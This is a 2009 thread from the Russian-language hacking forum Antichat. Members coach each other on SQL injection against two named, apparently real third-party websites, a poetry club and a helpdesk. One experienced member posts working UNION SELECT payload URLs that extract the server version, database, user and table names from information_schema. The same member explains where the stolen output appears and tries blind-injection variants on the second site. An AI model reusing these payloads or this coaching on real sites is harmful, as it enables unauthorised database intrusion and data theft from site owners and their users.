ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
19.05.2009, 11:22
|
|
Banned
Регистрация: 15.05.2009
Сообщений: 2
Провел на форуме:
99937
Репутация:
2
|
|
Я новичок в этом деле и прошу помочь или поправить меня.
Нашел ошибку
Код:
http://www.poetryclub.com.ua/author.php?id=3912'
Пишет:
Database error: Invalid SQL
MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND confirmed=1 AND is_deleted <> 1 AND is_del_user <> 1 ORDER BY id DESC' at line 1)
Session halted.
подбирал поля +order+by+1 на 2 уже выдаёт ошибку:
Database error: Invalid SQL
MySQL Error: 1054 (Unknown column '2' in 'order clause')
Session halted.
, поэтому думаю что 1 поле.
Далее выполняю запрос
Код:
http://www.poetryclub.com.ua/author.php?id=3912'+union+select+1/*
получаю
Database error: next_record called with no query pending. MySQL Error: () Session halted.
Мне осталось подобрать только название таблиц или я вообще все нетак сделал? |
|
|
19.05.2009, 12:11
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919
Репутация:
229
|
|
Я новичок в этом деле и прошу помочь или поправить меня.
Нашел ошибку
Код:
http://www.poetryclub.com.ua/author.php?id=3912'
Код:
http://www.poetryclub.com.ua/author.php?id=3912+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),char(58),Database(),char(58),User()),0x71),0x71)+LIMIT+1,1--
Кодируй и декодируй строку запроса в таких случаях как в примере выше, так ты сможешь избежать многих ошибок. Дальше думаю разберешься сам 
Последний раз редактировалось nemaniak; 19.05.2009 в 12:15..
|
|
|
|
19.05.2009, 14:41
|
|
Banned
Регистрация: 15.05.2009
Сообщений: 2
Провел на форуме:
99937
Репутация:
2
|
|
Вот тут я и застрял весь запрос url у меня выходит в Id пользователя начиная с его номера
3912 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(Version()),0x71),0x 71)/*
|
|
|
|
19.05.2009, 15:38
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919
Репутация:
229
|
|
Вот тут я и застрял весь запрос url у меня выходит в Id пользователя начиная с его номера
3912 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(Version()),0x71),0x 71)/*
Код:
http://www.poetryclub.com.ua/author.php?id=3912+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(table_name,0x71),0x71)+FROM+information_schema.tables+LIMIT+17,100--
смотри внимательней, результат выводится в поле Опублiковано
|
|
|
|
19.05.2009, 18:48
|
|
Banned
Регистрация: 15.05.2009
Сообщений: 2
Провел на форуме:
99937
Репутация:
2
|
|
точно, спасибо не заметил  |
|
|
|
19.05.2009, 21:49
|
|
Участник форума
Регистрация: 07.01.2008
Сообщений: 152
Провел на форуме:
315077
Репутация:
24
|
|
помогите расковырять, не получается ...
http://helpdesk.flygroup.st/index.php?_m=tickets-999+union+select+1,version(),3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45 ,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,6 2,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78, 79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95 ,96,97,98,99,100,101,102,103,104,105,106,107,108,1 09,110,111,112,113,114,115,116,117,118,119,120,121 ,122,123,124,125,126,127,128,129,130,131,132,133,1 34,135,136,137))'/&_a=submit
|
|
|
|
20.05.2009, 15:24
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919
Репутация:
229
|
|
помогите расковырять, не получается ...
http://helpdesk.flygroup.st/index.php?_m=tickets-999+union+select+1,version(),3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45 ,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,6 2,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78, 79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95 ,96,97,98,99,100,101,102,103,104,105,106,107,108,1 09,110,111,112,113,114,115,116,117,118,119,120,121 ,122,123,124,125,126,127,128,129,130,131,132,133,1 34,135,136,137))'/&_a=submit
с чего ты решил что это скуль? больше на инклуд похоже...
|
|
|
|
20.05.2009, 15:52
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Мда... Нету тут ни инклюда ни инъекции...
|
|
|
|
20.05.2009, 21:27
|
|
Участник форума
Регистрация: 07.01.2008
Сообщений: 152
Провел на форуме:
315077
Репутация:
24
|
|
Сообщение от mailbrush
Мда... Нету тут ни инклюда ни инъекции...
Но ошибку то выдает ... (( не ужто не чего нельзя сделать
Сообщение от nemaniak
с чего ты решил что это скуль? больше на инклуд похоже...
почему ?
|
|
|
|
20.05.2009, 21:56
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919
Репутация:
229
|
|
Сообщение от nemaniak
с чего ты решил что это скуль? больше на инклуд похоже...
во-первых, если это скажем слепая инъекция, то
Код:
http://helpdesk.flygroup.st/index.php?_m=tickets+or+1=1&_a=submit
или
Код:
http://helpdesk.flygroup.st/index.php?_m=tickets+or+1=1--&_a=submit
или
Код:
http://helpdesk.flygroup.st/index.php?_m=tickets/**/or/**/1=1&_a=submit
или другая вариация должны выдать тоже что и
Код:
http://helpdesk.flygroup.st/index.php?_m=tickets&_a=submit
а оно выводит лишь пустое поле...
Во-вторых, запрос
Код:
http://helpdesk.flygroup.st/index.php?_m=-tickets&_a=submit
выдает ошибку при обработке скрипта, но никак не ошибку скуля. Так что данная бага дает нам лишь раскрытие пути к сайту
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Undead]](/avatars/avatar85481.jpg?1284110){kind=avatar}
![Аватар для [Undead]](/avatars/avatar85481.jpg?1284374){kind=avatar}
![Аватар для [Undead]](/avatars/avatar85481.jpg?1284849){kind=avatar}
Похожие темы
Линейный вид
